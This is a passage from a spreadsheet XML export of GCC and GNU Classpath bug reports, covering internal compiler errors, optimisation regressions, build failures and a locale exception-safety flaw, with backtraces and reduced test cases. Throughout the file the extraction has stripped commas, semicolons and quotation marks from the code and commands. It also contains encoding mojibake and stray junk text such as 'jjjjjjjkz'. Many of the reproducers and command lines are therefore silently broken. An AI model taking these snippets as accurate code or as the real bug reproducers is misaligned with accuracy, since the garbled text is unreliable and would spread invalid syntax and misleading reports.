    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
#4  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
#5  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
#6  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
#7  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
#8  0x000000000093b2d5 in estimate_calls_size_and_time (size=size@entry=0x7ffff0bdf08c time=time@entry=0x7ffff0bdf088 
    hints=hints@entry=0x0 possible_truths=possible_truths@entry=4294967294 known_vals=known_vals@entry=0x0 
    known_binfos=known_binfos@entry=0x0 known_aggs=known_aggs@entry=0x0 node= node=)
    at ../../gcc-svn/trunk/gcc/ipa-inline-analysis.c:2768
[1] http://gcc.gnu.org/ml/gcc-cvs/2012-10/msg01070.html</t>
  </si>
  <si>
    <t>GCC-63754</t>
  </si>
  <si>
    <t>h8300 ICE in as_a at is-a.h:192 during libgcc autoconf probe</t>
  </si>
  <si>
    <t>Created attachment 33898
autoconf probe for ICE
configure:: /users/joel/test-gcc/b-h8300-rtems4.11-gcc/./gcc/xgcc -B/users/joel/test-gcc/b-h8300-rtems4.11-gcc/./gcc/ -nostdinc -B/users/joel/test-gcc/b-h8300-rtems4.11-gcc/h8300-rtems4.11/h8300s/newlib/ -isystem /users/joel/test-gcc/b-h8300-rtems4.11-gcc/h8300-rtems4.11/h8300s/newlib/targ-include -isystem /users/joel/test-gcc/gcc/newlib/libc/include -B/users/joel/test-gcc/install-head/h8300-rtems4.11/bin/ -B/users/joel/test-gcc/install-head/h8300-rtems4.11/lib/ -isystem /users/joel/test-gcc/install-head/h8300-rtems4.11/include -isystem /users/joel/test-gcc/install-head/h8300-rtems4.11/sys-include  -ms -c --save-temps -fexceptions  conftest.c &gt;&amp;5
conftest.c: In function 'foo':
conftest.c:19:1: internal compiler error: in as_a at is-a.h:192
 }
 ^
0xb62c73 rtx_insn* as_a(rtx_def*)
	../../gcc/gcc/is-a.h:192
0xb62c73 Fpa
	../../gcc/gcc/config/h8300/h8300.c:525
0xb62c73 h8300_push_pop
	../../gcc/gcc/config/h8300/h8300.c:719
0xb62fb9 h8300_push_pop
	../../gcc/gcc/config/h8300/h8300.c:874
0xb62fb9 h8300_expand_prologue()
	../../gcc/gcc/config/h8300/h8300.c:885
0xb6e25a gen_prologue()
	../../gcc/gcc/config/h8300/h8300.md:2651
0x6cc4f7 thread_prologue_and_epilogue_insns
	../../gcc/gcc/function.c:5678
0x6cc4f7 rest_of_handle_thread_prologue_and_epilogue
	../../gcc/gcc/function.c:6248
0x6cc4f7 execute
	../../gcc/gcc/function.c:6286
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
configure:: $? = 1
configure: failed program was:
| /* confdefs.h */
| #define PACKAGE_NAME GNU C Runtime Library
| #define PACKAGE_TARNAME libgcc
| #define PACKAGE_VERSION 1.0
| #define PACKAGE_STRING GNU C Runtime Library 1.0
| #define PACKAGE_BUGREPORT 
| #define PACKAGE_URL http://www.gnu.org/software/libgcc/
| #define SIZEOF_DOUBLE 4
| #define SIZEOF_LONG_DOUBLE 4
| #define HAVE_GETIPINFO 1
| /* end confdefs.h.  */
| 
| void bar ()
| void clean (int *)
| void foo ()
| {
|   int i __attribute__ ((cleanup (clean)))
|   bar()
| }
| 
configure:4262: result: unknown
configure:4278: error: unable to detect exception model
jjjjjjjkz</t>
  </si>
  <si>
    <t>GCC-1072</t>
  </si>
  <si>
    <t>Exception-unsafe code in locale</t>
  </si>
  <si>
    <t>This code is from libstdc++-v3/src/localename.cc:
  locale::_Impl::
  _Impl(const _Impl&amp; __other const string&amp; __name category __cat 
        size_t __refs)
    : _M_references(__refs - 1) _M_has_name(__other._M_name != *)
  {
    __cat = _S_normalize_category(__cat)  // might throw
    try 
      { _M_facets = new __vec_facet(*(__other._M_facets)) }
    catch(...) 
      {
        delete _M_facets
        throw
      }
    try 
      { _M_category_names = new __vec_string(*(__other._M_category_names)) }
    catch(...) 
      {
        delete _M_category_names
        throw
      }
These catch blocks are useless since the target pointers
are never modified if either operator new or the
constructors throw an exception. In fact they will
probably cause a crash since the pointers are not
initialized before the try block.
Also if an exception is thrown from the second try block
the object allocated in the first one is leaked.
This problem appears in all constructors of locale::_Impl
Release:
gcc version 2.97 20001211 (experimental)
Environment:
i586-pc-linux-gnu</t>
  </si>
  <si>
    <t>peturr</t>
  </si>
  <si>
    <t>GCC-81203</t>
  </si>
  <si>
    <t>[8 Regression] tail recursion: internal compiler error: verify_ssa failed</t>
  </si>
  <si>
    <t>a
b() {
      int c d
        if (a)
              d = b()
          return 1 + c + d
}
with -O2 causes
t9.c:7:1: error: definition in block 3 does not dominate use in block 4
 }
 ^
for SSA_NAME: _2 in statement:
_10 = _2 + d_3
during GIMPLE pass: tailr
t9.c:7:1: internal compiler error: verify_ssa failed
0x11b735a verify_ssa(bool bool)
        /space/rguenther/src/svn/early-lto-debug/gcc/tree-ssa.c:1186
0xddbe23 execute_function_todo
        /space/rguenther/src/svn/early-lto-debug/gcc/passes.c:1996
0xddadbd do_per_function
        /space/rguenther/src/svn/early-lto-debug/gcc/passes.c:1655
0xddbfc4 execute_todo
        /space/rguenther/src/svn/early-lto-debug/gcc/passes.c:2043
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>CLASSPATH-36220</t>
  </si>
  <si>
    <t>NPEs in gnu.xml.transform.* clone methods</t>
  </si>
  <si>
    <t>The clone methods in gnu.xml.transform clone fields without checking the child isn't null first. In particular:
gnu.xml.transform.SortKey
gnu.xml.transform.CallTemplateNode
gnu.xml.transform.ParameterNode
Changing these to set the cloned child fields to null fixes problems when running SPEC jvm 2008.</t>
  </si>
  <si>
    <t>GCC-21308</t>
  </si>
  <si>
    <t>[4.0 Regression] Very high compile time</t>
  </si>
  <si>
    <t>Compiling this program takes a very long time with GCC 4.x compared with GCC
3.3. GCC 3.4 fails to compile it which has already been reported as PR18462.
Compile times for current mainline GCC 4.0 and GCC 3.3 on a 500 MHz Pentium III
with 512 MB RAM:
[petur@interim cgx]$ time g++-cvs -O3 -c CheckersGameX.ii
real    0m41.298s
user    0m39.016s
sys     0m0.958s
[petur@interim cgx]$ g++-cvs -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-cvs/configure --program-suffix=-cvs
--enable-threads=posix --enable-languages=cc++ --enable-__cxa_atexit
--prefix=/home/petur/opt/gcc-cvs --disable-checking
Thread model: posix
gcc version 4.1.0 20050430 (experimental)
[petur@interim cgx]$ time g++400 -O3 -c CheckersGameX.ii
real    0m43.372s
user    0m39.739s
sys     0m0.966s
[petur@interim cgx]$ g++400 -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.0.0/configure --program-suffix=400
--enable-version-specific-runtime-libs --enable-threads=posix
--enable-languages=cc++java --enable-__cxa_atexit
Thread model: posix
gcc version 4.0.0
[petur@interim cgx]$ time g++335 -O3 -c CheckersGameX.ii
real    0m0.115s
user    0m0.051s
sys     0m0.018s
[petur@interim cgx]$ g++335 -v
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.5/specs
Configured with: ../gcc-3.3.5/configure --program-suffix=335
--enable-threads=posix --enable-version-specific-runtime-libs
--enable-languages=cc++
Thread model: posix
gcc version 3.3.5</t>
  </si>
  <si>
    <t>GCC-32559</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with vector arithmetic</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE on mainline:
=============================================
int __attribute__((vector_size (8))) v
void foo()
{
  v += ~v
}
=============================================
bug.c: In function 'foo':
bug.c:5: internal compiler error: in build_int_cst_wide at tree.c:886
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-13438</t>
  </si>
  <si>
    <t>[3.4 Regression] internal compiler error: tree check: expected identifier_node have integer_cst in c_parse_error at c-common.c:5921</t>
  </si>
  <si>
    <t>struct A { friend typename struct B } 
This is a very recent regression as Phil's regression hunter only goes to 20031209.
And it is most likely caused by:
2003-12-17  Mark Mitchell  
        PR c++/10603
        PR c++/12827
        * parser.c (cp_parser_error): Help c_parse_error print good
        messages if the next token is a keyword.
        (cp_parser_parameter_declaration_list): When resynchronizing after
        a bad parameter declaration stop if a comma is found.
        (cp_parser_parameter_declaration): Avoid backtracking.</t>
  </si>
  <si>
    <t>GCC-3877</t>
  </si>
  <si>
    <t>Test program ff90-1.f fails at -O0</t>
  </si>
  <si>
    <t>The following test program fails on i686-pc-cygwin when compiled with -O0 -ff90.  It passes at other optimization levels.
C Test compiler flags: -ff90
C Origin: David Billinghurst 
C
C Read the g77 manual entry on CMPAMBIG
C
C { dg-do run }
C { dg-options -ff90 }
      double complex z
      z = (2.0d01.0d0)
      call s(real(z))
      end
      subroutine s(x)
      double precision x
      if ( abs(z-2.0d0) .gt. 1.0e-5 ) call abort
      end
Release:
gcc-3.1 20010727
Environment:
i686-pc-cygwin NT4/SP5
How-To-Repeat:
g77 -o a.out -ff90 -O0 ff90-1.f
./a.out</t>
  </si>
  <si>
    <t>GCC-59366</t>
  </si>
  <si>
    <t>A friend function template defined in a class is found without ADL</t>
  </si>
  <si>
    <t>Reduced test:
struct X
{
	//friend void f(int) {} // #1
	template  friend void f(T) {} // #2
}
int main()
{
	f(5) // #3
}
The function in #1 is correctly not found at #3. The template
at #2 is which shouldn't happen since such a friend should be
found by ADL only and there's no ADL going on here.</t>
  </si>
  <si>
    <t>GCC-12082</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Inappropriate unreachable code warnings</t>
  </si>
  <si>
    <t>Options given when GCC was configured/built:
  I configured gcc 3.3.1 with no options just invoked it as ./configure.
Command line that triggers the bug:
  g++ -v --save-temps -Wunreachable-code  -O3 preprocessModifiedFiles.C -o
preprocessModifiedFiles
Compiler output:
g++ -v --save-temps -Wunreachable-code  -O3 preprocessModifiedFiles.C -o
preprocessModifiedFiles
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/specs
Configured with: ./configure --cache-file=config.cache
Thread model: posix
gcc version 3.3.1
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/cc1plus -E -D__GNUG__=3 -quiet
-v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=1 -D_GNU_SOURCE
preprocessModifiedFiles.C -Wunreachable-code -O3 preprocessModifiedFiles.ii
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/c++/3.3.1
 /usr/local/include/c++/3.3.1/i686-pc-linux-gnu
 /usr/local/include/c++/3.3.1/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/cc1plus -fpreprocessed
preprocessModifiedFiles.ii -quiet -dumpbase preprocessModifiedFiles.C -auxbase
preprocessModifiedFiles -O3 -Wunreachable-code -version -o preprocessModifiedFiles.s
GNU C++ version 3.3.1 (i686-pc-linux-gnu)
	compiled by GNU C version 3.3.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
preprocessModifiedFiles.C: In function `int main(int char**)':
preprocessModifiedFiles.C:1147: warning: will never be executed
preprocessModifiedFiles.C:1147: warning: will never be executed
preprocessModifiedFiles.C:1147: warning: will never be executed
preprocessModifiedFiles.C: In function `int preprocess(const char* const 
   char*)':
preprocessModifiedFiles.C:773: warning: will never be executed
preprocessModifiedFiles.C:753: warning: will never be executed
preprocessModifiedFiles.C:732: warning: will never be executed
preprocessModifiedFiles.C:747: warning: will never be executed
preprocessModifiedFiles.C:631: warning: will never be executed
preprocessModifiedFiles.C:631: warning: will never be executed
preprocessModifiedFiles.C:629: warning: will never be executed
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o preprocessModifiedFiles.o preprocessModifiedFiles.s
GNU assembler version 2.14 (i686-pc-linux-gnu) using BFD version 2.14 20030612
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/collect2 --eh-frame-hdr -m
elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o preprocessModifiedFiles
/usr/lib/crt1.o /usr/lib/crti.o
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/crtbegin.o
-L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1
-L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/../../../../i686-pc-linux-gnu/lib
-L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/../../..
preprocessModifiedFiles.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc
/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/crtend.o /usr/lib/crtn.o
I will attach the compressed preprocessed file preprocessModifiedFiles.ii after
I've submitted this report to Bugzilla don't see how to do so upon bug creation.
Why I think this is a bug:
I believe the will never be executed warnings are incorrect.
Additional details:
I am running on an IBM Netvista type 6792-MHU computer under a Red 
Hat 7.3 GNU/Linux distribution.  Linux kernel 2.40.20 1536MB of RAM
1GB of swap space.  Pentium 4 (1.80 GHz processor).  Please let me
know if I can provide you with additional information.
I compiled GCC myself from the 3.3.1 tarball using gcc 2.96.  The
build and install completed normally.  Before I compiled gcc I
compiled and installed binutils 2.14:
  Bash$ gcc --version
  gcc (GCC) 3.3.1
  [...]
  Bash$ as --version
  GNU assembler 2.14 20030612
  [...]
I have tried to trim down the program text I'm appending but the
really short versions don't show the warning.  
Sincerely Yours
--Steven Augart
  Jikes RVM Open Source Java Compiler Project
  http://www.ibm.com/developerworks/oss/jikesrvm/</t>
  </si>
  <si>
    <t>augart</t>
  </si>
  <si>
    <t>GCC-9889</t>
  </si>
  <si>
    <t>installation gcc 3.2.2 fails on Solaris 2.8</t>
  </si>
  <si>
    <t>I configured and installed GCC 3.2.2 on Solaris 8 and got error
messages:
mksh: Fatal error in reader: = missing from replacement macro reference
Current working directory /export/home/klee/test/gcc-3.2.2/sparc-sun-solaris2.8/sparcv9/libstdc++-v3/testsuite
*** Error code 1
make: Fatal error: Command failed for target `all-recursive'
Current working directory /export/home/klee/test/gcc-3.2.2/sparc-sun-solaris2.8/sparcv9/libstdc++-v3
See attach for more information.
Release:
3.2.2
Environment:
Solaris 8: SunOS 5.8 sun4u sparc SUNWUltra-4 64bits multi
processors
How-To-Repeat:
% configure --prefix=/home/mydir
% make</t>
  </si>
  <si>
    <t>xkinh</t>
  </si>
  <si>
    <t>GCC-20653</t>
  </si>
  <si>
    <t>value too large for field on k6-2 (loop instruction)</t>
  </si>
  <si>
    <t>This error only seems to occur when -O2 -march=k6-2 -ftracer are used
together.  Removing -ftracer causes the error to go away.  This problem does not
seem to exist in the GCC4.0 branch.
i686-pc-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I. -I.. -I../include -O20 -ffast-math
-D_REENTRANT -fsigned-char -march=k6-2 -ftracer -O2 -mno-sse2 -fPIC
-DUSE_MEMORY_H -MT psy.lo -MD -MP -MF .deps/psy.Tpo -c psy.c  -fPIC -DPIC -o
.libs/psy.o -save-temps
psy.s: Assembler messages:
psy.s:6581: Error: value of ffffffffffffff7f too large for field of 1 bytes at
0000000000000428
gcc -v
Reading specs from /usr/lib/gcc/i686-pc-linux-gnu/3.4.3-20050110/specs
Configured with: /var/tmp/portage/gcc-3.4.3.20050110-r1/work/gcc-3.4.3/configure
--enable-version-specific-runtime-libs --prefix=/usr
--bindir=/usr/i686-pc-linux-gnu/gcc-bin/3.4.3-20050110
--includedir=/usr/lib/gcc/i686-pc-linux-gnu/3.4.3-20050110/include
--datadir=/usr/share/gcc-data/i686-pc-linux-gnu/3.4.3-20050110
--mandir=/usr/share/gcc-data/i686-pc-linux-gnu/3.4.3-20050110/man
--infodir=/usr/share/gcc-data/i686-pc-linux-gnu/3.4.3-20050110/info
--with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/3.4.3-20050110/include/g++-v3
--host=i686-pc-linux-gnu --disable-altivec --enable-nls
--without-included-gettext --enable-__cxa_atexit --disable-sjlj-exceptions
--enable-clocale=gnu --with-system-zlib --disable-checking --disable-werror
--disable-libunwind-exceptions --disable-multilib --disable-libgcj
--enable-languages=cc++ --enable-shared --enable-threads=posix
Thread model: posix
gcc version 3.4.3-20050110 (Gentoo Linux 3.4.3.20050110-r1
ssp-3.4.3.20050110-0 pie-8.7.7)</t>
  </si>
  <si>
    <t>GCC-77463</t>
  </si>
  <si>
    <t>internal compiler error: in output_move_qimode at config/m68k/m68k.c:3160</t>
  </si>
  <si>
    <t>Created attachment 39542
File to reproduce the bug
When using the -Os switch I get the following error:
In file included from libc/inet/inet_ntoa.c:8:0:
libc/inet/addr.c: In function 'inet_ntoa_r':
libc/inet/addr.c:135:1: internal compiler error: in output_move_qimode at config/m68k/m68k.c:3160
The error disappears without the mentioned switch.
Command line and output:
/home/matze/atari/gcc-4.6.3-nolibc/m68k-linux/bin/gcc -v -c inet_ntoa.i -Os  -m68000
Using built-in specs.
COLLECT_GCC=/home/matze/atari/gcc-4.6.3-nolibc/m68k-linux/bin/gcc
COLLECT_LTO_WRAPPER=/home/matze/atari/gcc-4.6.3-nolibc/m68k-linux/bin/../libexec/gcc/m68k-linux/4.6.3/lto-wrapper
Target: m68k-linux
Configured with: /home/tony/buildall/src/gcc/configure --target=m68k-linux --host=x86_64-linux-gnu --build=x86_64-linux-gnu --enable-targets=all --prefix=/opt/cross/gcc-4.6.3-nolibc/m68k-linux/ --enable-languages=c --with-newlib --without-headers --enable-sjlj-exceptions --with-system-libunwind --disable-nls --disable-threads --disable-shared --disable-libmudflap --disable-libssp --disable-libgomp --disable-decimal-float --enable-checking=release --with-mpfr=/home/tony/buildall/src/sys-x86_64 --with-gmp=/home/tony/buildall/src/sys-x86_64 --disable-bootstrap --disable-libquadmath
Thread model: single
gcc version 4.6.3 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-c' '-Os' '-m68000'
 /home/matze/atari/gcc-4.6.3-nolibc/m68k-linux/bin/../libexec/gcc/m68k-linux/4.6.3/cc1 -fpreprocessed inet_ntoa.i -quiet -dumpbase inet_ntoa.i -m68000 -auxbase inet_ntoa -Os -version -o /tmp/ccBJ8k10.s
GNU C (GCC) version 4.6.3 (m68k-linux)
	compiled by GNU C version 4.3.2 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (GCC) version 4.6.3 (m68k-linux)
	compiled by GNU C version 4.3.2 GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 16d5cdc94766d56994b51e72043cc603
In file included from libc/inet/inet_ntoa.c:8:0:
libc/inet/addr.c: In function 'inet_ntoa_r':
libc/inet/addr.c:135:1: internal compiler error: in output_move_qimode at config/m68k/m68k.c:3160
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>matthias.reis</t>
  </si>
  <si>
    <t>GCC-66729</t>
  </si>
  <si>
    <t>Segfault starting with r224967</t>
  </si>
  <si>
    <t>Ran in to following error starting with subject revision while trying to bootstrap.
Config:
/home/pthaugen/src/gcc/gcc_hunt/gcc/configure --prefix=/home/pthaugen/install/gcc/gcc_hunt --enable-decimal-float --enable-lto --with-as=/home/pthaugen/install/binutils/binutils-2.25/bin/as --with-ld=/home/pthaugen/install/binutils/binutils-2.25/bin/ld --with-gmp=/home/pthaugen/install/gcc-host-libs --without-ppl --without-cloog --enable-languages=cc++fortran
/home/pthaugen/work/build/gcc/gcc_hunt/./gcc/xgcc -B/home/pthaugen/work/build/gcc/gcc_hunt/./gcc/ -B/home/pthaugen/install/gcc/gcc_hunt/powerpc64-unknown-linux-gnu/bin/ -B/home/pthaugen/install/gcc/gcc_hunt/powerpc64-unknown-linux-gnu/lib/ -isystem /home/pthaugen/install/gcc/gcc_hunt/powerpc64-unknown-linux-gnu/include -isystem /home/pthaugen/install/gcc/gcc_hunt/powerpc64-unknown-linux-gnu/sys-include    -g -O2 -m32 -O2  -g -O2 -DIN_GCC    -W -Wall -Wwrite-strings -Wcast-qual -Wno-format -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -mlong-double-128 -mno-minimal-toc -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fPIC -mlong-double-128 -mno-minimal-toc -I. -I. -I../../.././gcc -I/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc -I/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/. -I/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../gcc -I/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../include -I/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber/dpd -I/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber -DHAVE_CC_TLS  -o decContext.o -MT decContext.o -MD -MP -MF decContext.dep -c /home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber/decContext.c
In file included from /home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber/decContext.h:246:0
                 from /home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber/decContext.c:38:
/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber/decContext.c: In function â€˜__decContextStatusToStringâ€™:
/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber/decContextSymbols.h:16:34: internal compiler error: Segmentation fault
 #define decContextStatusToString __decContextStatusToString
                                  ^
/home/pthaugen/src/gcc/gcc_hunt/gcc/libgcc/../libdecnumber/decContext.c:352:13: note: in expansion of macro â€˜decContextStatusToStringâ€™
 const char *decContextStatusToString(const decContext *context) {
             ^
0x10d2ed5f crash_signal
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/toplev.c:366
0x117fee78 trim_filename(char const*)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/diagnostic.c:944
0x117fff87 fancy_abort(char const* int char const*)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/diagnostic.c:1340
0x111d635f inchash::add_expr(tree_node const* inchash::hash&amp;)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/tree.c:7708
0x10d7b167 iterative_hash_expr
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/tree.h:4519
0x10d7e7df tree_operand_hash::hash(tree_node const*)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/tree-hash-traits.h:33
0x10d802f7 simple_hashmap_traits::hash(tree_node* const&amp;)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/hash-map-traits.h:126
0x110c9f9f hash_map val_ssa_equiv_hash_traits&gt;::get(tree_node* const&amp;)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/hash-map.h:141
0x110c9367 uncprop_into_successor_phis
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/tree-ssa-uncprop.c:408
0x110c9737 uncprop_dom_walker::before_dom_children(basic_block_def*)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/tree-ssa-uncprop.c:495
0x11628d93 dom_walker::walk(basic_block_def*)
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/domwalk.c:183
0x110c9933 execute
	/home/pthaugen/src/gcc/gcc_hunt/gcc/gcc/tree-ssa-uncprop.c:544
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-51821</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7 Regression] 64bit &gt; 32bit conversion produces incorrect results with optimizations</t>
  </si>
  <si>
    <t>#include 
#include 
#include 
uint32_t test(unsigned int shift_size) {
    uint64_t res = 0
    res = ~res
    res = res &lt;&lt; shift_size //Shift size &lt; uint64_t width so this should work
    return res //Implicit cast to uint32_t
}
int main(int argc char *argv[])
{
    unsigned int dst
    sscanf(argv[1] %u  //Get arg from outside so optimizer doesn't eat everything
    printf(%PRIu32\n test(dst))
    return 0
}
This program produces different output if compiled without optimization or compiled with -O2 on i686 machines.
[11:56:58 0 ~/tmp] $ gcc -Wall -Wextra shiftbug.c
shiftbug.c: In function â€˜mainâ€™:
shiftbug.c:12:14: warning: unused parameter â€˜argcâ€™ [-Wunused-parameter]
[11:57:01 0 ~/tmp] $ ./a.out 32
0
[11:57:03 0 ~/tmp] $ gcc -O2  -Wall -Wextra shiftbug.c
shiftbug.c: In function â€˜mainâ€™:
shiftbug.c:12:14: warning: unused parameter â€˜argcâ€™ [-Wunused-parameter]
[11:57:14 0 ~/tmp] $ ./a.out 32
4294967295
[11:57:15 0 ~/tmp] $
I cannot find anything in the program that is undefined/implementation defined behavior the program should give the same output with or without optimization.
On an x86_64 machine the output is 0 with and without optimization.
Note that it seems not directly connected to the types in the shift expression res = (uint64_t)res &lt;&lt; (uint64_t)shift_size produces the same result.
Run on:
Linux localhost 3.1.2-1.fc16.i686 #1 SMP Tue Nov 22 08:56:28 UTC 2011 i686 i686 i386 GNU/Linux
 $ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/i686-redhat-linux/4.6.2/lto-wrapper
Target: i686-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch=i686 --build=i686-redhat-linux
Thread model: posix
gcc version 4.6.2 20111027 (Red Hat 4.6.2-1) (GCC)</t>
  </si>
  <si>
    <t>nos.utelsystems</t>
  </si>
  <si>
    <t>GCC-83402</t>
  </si>
  <si>
    <t>PPC64 implementation of ./rs6000/emmintrin.h gives out of range for _mm_slli_epi32</t>
  </si>
  <si>
    <t>The rs6000/emmintrin.h implementation of _mm_slli_epi32 reports:
  error: argument 1 must be a 5-bit signed literal
For constant shift values &gt; 15.
The implementation uses vec_splat_s32 (Vector Splat Immediate Signed Word) for const shift values to generate the shift count for vec_vslw (Vector Shift Left Word). This is preferred to the more expensive vec_splats.
The immediate field of vspltisw is 5 bits but it is sign extended and the shift rang must be positive. This limits the immediate range for vspltisw to 0-15 (not the required 0-31).
The current implementation uses:
      if (__builtin_constant_p(__B))
	lshift = (__v4su) vec_splat_s32(__B)
      else
	lshift = vec_splats ((unsigned int) __B)
so we need something like:
      if (__builtin_constant_p(__B) &amp;&amp; (__B &lt; 16))</t>
  </si>
  <si>
    <t>pc</t>
  </si>
  <si>
    <t>munroesj</t>
  </si>
  <si>
    <t>GCC-43179</t>
  </si>
  <si>
    <t>ICE invalid if accessing array member of non-array</t>
  </si>
  <si>
    <t>subroutine bar
type t
  integer allocatable :: a(:)
end type t
type(t)  :: foo
if (allocated(foo(1)%a)) call abort()
end</t>
  </si>
  <si>
    <t>GCC-33722</t>
  </si>
  <si>
    <t>putenv() is made posix-conformant on FreeBSD 7.x</t>
  </si>
  <si>
    <t>The putenv() in the FreeBSD 7.x is made posix-conforming that means
that the function does not make the copy of the argument string for entering
it into the environment.
As consequence gcc/ada/env.c __gnat_setenv() function shall not call
free() on the malloc'ed string. Otherwise memory of the environment
strings become corrupted. In particular bootstrap cannot proceed because
gnat tools segfaults.</t>
  </si>
  <si>
    <t>kostikbel</t>
  </si>
  <si>
